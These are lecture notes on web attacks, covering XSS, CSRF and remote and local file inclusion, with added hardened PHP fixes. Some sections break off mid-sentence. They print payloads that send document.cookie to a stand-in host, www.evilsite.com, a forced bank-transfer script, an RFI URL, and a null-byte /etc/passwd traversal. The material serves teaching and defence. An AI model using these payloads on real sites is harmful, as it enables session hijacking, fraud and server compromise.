Computer Security
Lecture – 20: Web Security - 2
Sandboxing
The Sandbox
Before continuing the discussion of such attacks on clients, it is helpful to introduce the idea of the sandbox. A sandbox refers to the restricted privileges of an application or script that is running inside another application. For example, a sandbox may allow access only to certain files and devices. These limitations are collectively known as a sandbox. (See Figure 15.)

Figure 15: Actions allowed in the sandbox (read, write, execute) apply only to certain files and devices rather than to all user files.
• These are attacks where improper input validation on a web site allows malicious users to inject code into the web site
• which later is executed in a visitor’s browser

Persistent XSS
• In a persistent XSS attack, the code that the attacker injects into the web site remains on the site for a period of time and is visible to other users
• A classic example of persistent XSS is exploiting a web site’s guestbook or message board
• Consider a web site, such as a news web site or social networking site, that incorporates a guestbook allowing visitors to enter comments and post them for other visitors to see
• If the user input to be stored in the guestbook is not properly sanitised to strip certain characters, it may be possible for an attacker to inject malicious code that is executed when other users visit the site

Consider a web site, such as a news web site or social networking site, that incorporates a guestbook allowing visitors to enter comments and post them for other visitors to see. If the user input to be stored in the guestbook is not properly sanitized to strip certain characters, it may be possible for an attacker to inject malicious code that is executed when other users visit the site. First, the user might be presented with the form from Code Fragment 6.

<html>
<title>Sign My Guestbook!</title>
<body>
Sign my guestbook!
<form action="sign.php" method="POST">
<input type="text" name="name">
<input type="text" name="message" size="40">
<input type="submit" value="Submit">
</form>
</body>
</html>
Code Fragment 6: A page which allows users to post comments to a guestbook.

On entering a comment, this page will submit the user’s input as POST variables to the page sign.php. This page presumably uses server-side code (which will be discussed later in this chapter) to insert the user’s input into the guestbook page, which might look something like that shown in Code Fragment 7.

<html>
<title>My Guestbook</title>
<body>
Your comments are greatly appreciated!<br />
Here is what everyone said:<br />
Joe: Hi! <br />
John: Hello, how are you? <br />
Jane: How does the guestbook work? <br />
</body>
</html>
Code Fragment 7: The guestbook page incorporating comments from visitors.

Take, for instance, the snippet of Javascript code in Code Fragment 8.

<script>
alert("XSS injection!");
</script>
Code Fragment 8: Javascript code that might be used to test XSS injection.

This Javascript code simply creates a pop-up message box with the text XSS injection! when the code is executed. If the sign.php script on the server simply copies whatever the user types in the POST form into the contents of the guestbook, the result would be the code shown in Code Fragment 9.

<html>
<title>My Guestbook</title>
<body>
Your comments are greatly appreciated!<br />
Here is what everyone said:<br />
Evilguy: <script>alert("XSS Injection!");</script> <br />
Joe: Hi! <br />
John: Hello, how are you? <br />
Jane: How does the guestbook work? <br />
</body>
</html>
Code Fragment 9: The resulting guestbook page, with the Javascript above injected via XSS.

If anyone visited the page containing the attacker’s comment, this excerpt would be executed as code and the user would get a pop-up message box. In this case, the guestbook is known as an attack vector—it’s the means by which a malicious user can inject code. The specifics of that injected code are known as the payload. In this case, the payload was a relatively harmless (if annoying) pop-up box, but it is possible to construct much more dangerous payloads. (See Figure 16.)

Figure 16: In an XSS attack, the attacker uses the web site as a vector to execute malicious code in a victim’s browser. (Figure elements: Attacker, XSS Vulnerable Website, Malicious Script, Victim.)

Javascript has the ability to redirect visitors to arbitrary pages, so this is one possible avenue for attack. Malicious users could simply inject a short script that redirects all viewers to a new page that attempts to download viruses or other malware to their systems. Combined with Javascript’s ability to access and manipulate cookies, this attack can become even more dangerous. For example, an attacker could inject the script of Code Fragment 10 into a guestbook.

<script>
document.location = "http://www.evilsite.com/steal.php?cookie="+document.cookie;
</script>
Code Fragment 10: A Javascript function that could be used to steal a user’s cookie.

This code uses Javascript’s ability to access the DOM to redirect a visitor to the attacker’s site, www.evilsite.com, and concatenates the user’s cookies (accessed by the DOM object document.cookie) to the URL as a GET parameter for the steal.php page, which presumably records the cookies. The attacker could then use the cookies to impersonate the victim at the target site in a session hijacking attack. Nevertheless, this technique is a bit crude, because a user would most likely notice if their browser was redirected to an unexpected page. There are, however, several techniques an attacker could use to hide the execution of this code. Two of the most popular are embedding an image request to the malicious URL and using an invisible iframe—an HTML element which makes it possible to embed a web page inside another. Code Fragment 11 shows a use of Javascript to create an image, then sets the source of that image to the attacker’s site, again passing the cookie variables to the steal.php page as a GET variable. When the page is rendered, the victim’s browser makes a request to this URL for the image, passing the cookie to the attacker without displaying any results (since no image is returned).

<script>
img = new Image();
img.src = "http://www.evilsite.com/steal.php?cookie=" + document.cookie;
</script>
Code Fragment 11: Using an image for XSS.
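A hardened sign.php, added here as an example and not the textbook's code: comments are stored as typed and every value is HTML-escaped when the guestbook of Code Fragment 7 is rendered, so the payload of Code Fragment 8 is displayed as text instead of being run. The flat file guestbook.txt and its one-JSON-object-per-line format are assumptions.

```php
<?php
// Added example, not the textbook's sign.php. Storage in a flat file next to
// the script (guestbook.txt, one JSON object per line) is an assumption.
declare(strict_types=1);

const GUESTBOOK_FILE = __DIR__ . '/guestbook.txt';

// Escape one untrusted string for an HTML text or attribute context.
// ENT_QUOTES covers both quote characters; ENT_SUBSTITUTE keeps malformed
// UTF-8 from silently turning the whole value into an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Store a comment exactly as typed. Escaping is done once, at output time,
// for the context the text is inserted into (the HTML body of Code Fragment 7).
function storeComment(string $name, string $message): bool
{
    $name = trim($name);
    $message = trim($message);
    if ($name === '' || $message === '' || strlen($name) > 40 || strlen($message) > 500) {
        return false;
    }
    $line = json_encode(['name' => $name, 'message' => $message]) . "\n";
    return file_put_contents(GUESTBOOK_FILE, $line, FILE_APPEND | LOCK_EX) !== false;
}

// Render the guestbook page. The vulnerable sign.php echoed name and message
// unescaped, which is how Code Fragment 9 came about.
function renderGuestbook(): string
{
    $out = "<html>\n<title>My Guestbook</title>\n<body>\n"
         . "Your comments are greatly appreciated!<br />\nHere is what everyone said:<br />\n";
    $lines = is_file(GUESTBOOK_FILE)
        ? file(GUESTBOOK_FILE, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES)
        : [];
    foreach ($lines as $line) {
        $entry = json_decode($line, true);
        if (!is_array($entry) || !isset($entry['name'], $entry['message'])) {
            continue;
        }
        // <script>alert("XSS injection!");</script> is emitted as
        // &lt;script&gt;alert(&quot;XSS injection!&quot;);&lt;/script&gt;
        $out .= h((string)$entry['name']) . ': ' . h((string)$entry['message']) . " <br />\n";
    }
    return $out . "</body>\n</html>\n";
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    storeComment((string)($_POST['name'] ?? ''), (string)($_POST['message'] ?? ''));
    header('Location: sign.php', true, 303);   // redirect after POST
    exit;
}
// Declaring the charset removes the encoding ambiguity that escaping relies on;
// the CSP is defence in depth: inline scripts stay blocked even if an escape is missed.
header('Content-Type: text/html; charset=UTF-8');
header("Content-Security-Policy: default-src 'self'");
echo renderGuestbook();
```

Setting session.cookie_httponly=1 in php.ini keeps the session cookie out of document.cookie, so the scripts of Code Fragments 10 and 11 could not read it even if an escape were missed.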
…and displayed in a web page at a later time, at which point the script will execute in the user’s browser.

Non-persistent XSS
• Another common type of web site scripting

CSRF
• While XSS exploits a user’s trust of a specific web site, a CSRF attack exploits a web site’s trust of a specific user. In a CSRF attack, a malicious web site causes a user to unknowingly execute commands on a third-party site that trusts that user.

Figure 17: In a CSRF attack, a malicious web site executes a request to a vulnerable site on behalf of a trusted user of that site. (Figure elements: Evil Website, Malicious Request, <script>.)

• Suppose an innocent user handles his banking online at www.naivebank.com
• This user may stumble upon a site, www.evilsite.com, that contains the lines of malicious JavaScript code in Code Fragment 14

<script>
document.location="http://www.naivebank.com/transferFunds.php?amount=10000&fromID=1234&toID=5678";
</script>
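One way the transferFunds.php page at www.naivebank.com could refuse the request forced by Code Fragment 14, as an added example that is not the textbook's code: state changes are accepted only over POST and only with a per-session token that a page on another origin cannot read. The form fields and the session layout are assumptions.

```php
<?php
// Added example, not the textbook's code. A transferFunds.php for
// www.naivebank.com that only moves money when the request carries the
// session's CSRF token; form fields and session layout are assumptions.
declare(strict_types=1);
session_start();

// Issue a random 256-bit token once per session. The bank's own transfer
// form embeds it, and a page on www.evilsite.com cannot read another
// origin's page, so it cannot copy the token into its forged request.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison so the check does not leak the token through timing.
function csrfTokenValid(?string $submitted): bool
{
    return $submitted !== null
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function renderTransferForm(): string
{
    $token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    return '<form action="transferFunds.php" method="POST">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . 'Amount: <input type="text" name="amount"> '
         . 'To account: <input type="text" name="toID"> '
         . '<input type="submit" value="Transfer"></form>';
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    // The GET that Code Fragment 14 forces never changes state: it only shows the form.
    header('Content-Type: text/html; charset=UTF-8');
    echo renderTransferForm();
    exit;
}
$submitted = isset($_POST['csrf_token']) ? (string)$_POST['csrf_token'] : null;
if (!csrfTokenValid($submitted)) {
    http_response_code(403);
    error_log('Rejected transfer: missing or invalid CSRF token, session ' . session_id());
    exit('Request rejected.');
}
// Token verified: perform the transfer here for the account bound to the
// logged-in session (the source account comes from the session, never
// from a fromID parameter the request could supply).
```

Marking the session cookie SameSite (session.cookie_samesite in php.ini, PHP 7.3 and later) adds a second, browser-enforced barrier against the same cross-site request.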
Figure: Model of server-side scripting, with a Client, a Web Server and a Scripting Module. 2. Server passes user input and scripted HTML to Scripting Module. 3. Scripting Module performs script, possibly accessing other servers and/or databases, and returns HTML. 4. Server returns to user dynamic content in a customized HTML file.
This variable, number, would most likely be provided through a standard HTML form, as in our previous example. The “<?php” and “?>” tags denote the start and end of the script. The echo command outputs results to the screen. The array that stores all of the GET variables provided is referred to as “$_GET”—in this case, we are accessing the one named number. Finally, note that variables $x and $y are used without a previous

<html>
<body>
<p>Your number was 5.</p>
<p>The square of your number is 25.</p>
</body>
</html>
Server-side scripting inclusion attack
• In a server-side script inclusion attack, a web security vulnerability at a web server is exploited to allow an attacker to inject arbitrary scripting code into the server
• which then executes this code to perform an action desired by the attacker
• Two types:
  • RFI (Remote-File Inclusion): enables an attacker to execute a remote script in another server
  • LFI (Local-File Inclusion): enables an attacker to execute a local malicious script in the same server
For example, one may want to include a common header and footer to all pages of a website. In addition, it may be useful to load different files based on user input. PHP provides the include function, which incorporates the file specified by the argument into the current PHP page, executing any PHP script contained in it. Consider the index.php page shown in Code Fragment 17, where “.” denotes concatenation of two strings.

<?php
include("header.html");
include($_GET['page'].".php");
include("footer.html");
?>
Code Fragment 17: A PHP page that uses file inclusion to incorporate an HTML header, an HTML footer, and a user-specified page.

Navigating to victim.com/index.php?page=news in this case would result in the web server loading and executing page news.php using the PHP processor, which presumably generates the news page and displays it for the user.

User submits: victim.com/index.php?page=news
Server executes: victim.com/index.php?page=news.php

However, an attacker might navigate to a page specified by the following URL:

http://victim.com/index.php?page=http://evilsite.com/evilcode

Attacker submits: http://victim.com/index.php?page=http://evilsite.com/evilcode
Server executes: http://evilsite.com/evilcode.php

This would result in the web server at victim.com executing the code at evilsite.com/evilcode.php locally. Such an attack is known as a remote-file inclusion (RFI) attack. An example of code an attacker might execute in such an attack is a web shell, which is a remote command station that allows an attacker to navigate to the web server and possibly view, edit, upload, or delete files on web sites that this web server is hosting. Fortunately, remote-file inclusion attacks are becoming less common, because most PHP installations now default to disallowing the server to execute code hosted on a separate server. Nevertheless, this does not pre-
As in an RFI attack, a local-file inclusion (LFI) attack causes a server to execute injected code it would not have otherwise performed (usually for a malicious purpose). The difference in an LFI attack, however, is that the executed code is not contained on a remote server, but on the victim server itself. This locality may allow an attacker access to private information by means of bypassing authentication mechanisms. For example, an attacker might navigate to the following URL:

http://victim.com/index.php?page=admin/secretpage

The URL above might cause the index page to execute the previously protected secretpage.php.

Attacker submits: http://victim.com/index.php?page=admin/secretpage
Server executes: victim.com/index.php?page=admin/secretpage.php
Authentication bypassed

Sometimes, LFI attacks can allow an attacker to access files on the web server’s system, outside of the root web directory. For example, many Linux systems keep a file at /etc/passwd that stores local authentication information. In the example above, note that attempting to access this file by navigating to the following URL will not work:

http://victim.com/index.php?page=/etc/passwd

Attacker submits: http://victim.com/index.php?page=/etc/passwd
Server executes: http://victim.com/index.php?page=/etc/passwd.php
Not found!

Because the code concatenates .php to any input before trying to include the code, the web server will try to execute /etc/passwd.php, which does not exist. To bypass this, an attacker could include what is known as a null byte, which can be encoded as %00 in a URL. The null byte denotes the end of the string, allowing the attacker to effectively remove the .php concatenation. In this case, the following URL could be accessed:

http://victim.com/index.php?page=/etc/passwd%00

Attacker submits: http://victim.com/index.php?page=/etc/passwd%00
Server executes: http://victim.com/index.php?page=/etc/passwd
Bingo!!
%00 -> the null byte -> end of string, ignore anything after it!

This form of attack may seem relatively benign when limited to information disclosure, but the advent of user-provided content suggests another method of attack using this technique. For example, a web site that is vulnerable to local-file inclusion might also have a means for users to upload images. If the image uploading form does not carefully check what is being uploaded, this may provide an attacker an avenue to upload malicious code to the server (that would not ordinarily be executed), and
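An index.php that replaces Code Fragment 17's include($_GET['page'].".php") with an allowlist lookup, added here as an example (not the textbook's code) for both the RFI and the LFI passages above: the evilsite.com URL, the admin/secretpage request and the /etc/passwd%00 request are all refused before include() sees them. The pages/ directory and the page names are assumptions.

```php
<?php
// Added example, not the textbook's Code Fragment 17. The user-controlled
// include($_GET['page'].".php") is replaced by an allowlist lookup, so no
// remote URL, other directory or null byte ever reaches include().
// The pages/ directory and the page names are assumptions.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';
// The only values of ?page= that are ever mapped to a file.
const ALLOWED_PAGES = ['news', 'about', 'contact'];

// Returns the absolute path of the page to include, or null if the request
// must be refused. Kept free of side effects so it can be unit-tested.
function resolvePage(?string $page): ?string
{
    if ($page === null || $page === '') {
        $page = 'news';                       // default page
    }
    // Exact, case-sensitive match. "http://evilsite.com/evilcode",
    // "admin/secretpage", "/etc/passwd" and "/etc/passwd\0" all fail here,
    // so the .php suffix trick and the %00 trick never come into play.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    // Belt and braces: the resolved file must be a direct child of pages/.
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

$requested = isset($_GET['page']) ? (string)$_GET['page'] : null;
$target = resolvePage($requested);
if ($target === null) {
    http_response_code(404);
    // Log the rejected value: repeated traversal or URL values are worth alerting on.
    error_log('index.php: refused page parameter ' . var_export($requested, true));
    exit('Page not found.');
}
include __DIR__ . '/header.html';
include $target;
include __DIR__ . '/footer.html';
```

With allow_url_include left at its default of Off, PHP itself already refuses the http://evilsite.com/... argument, and PHP 5.3.4 and later reject filesystem paths containing a null byte; the allowlist makes the page safe without relying on either setting.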
Since databases often contain confidential information, they are frequently the target of attacks. Attackers could, for example, be interested in accessing private information or modifying information in a database for financial gain. Because of the sensitivity of information stored in a database,

• An SQL injection attack involves

Figure 20: A model for user interactions with a web server that uses a database. All database queries are performed via the web server, and direct

Figure 21: How replication helps against DDOS web attacks: (a) A single web server for a web site, which is quite vulnerable to DDOS web attacks. (b) Multiple web servers for the same web site, which are more resilient.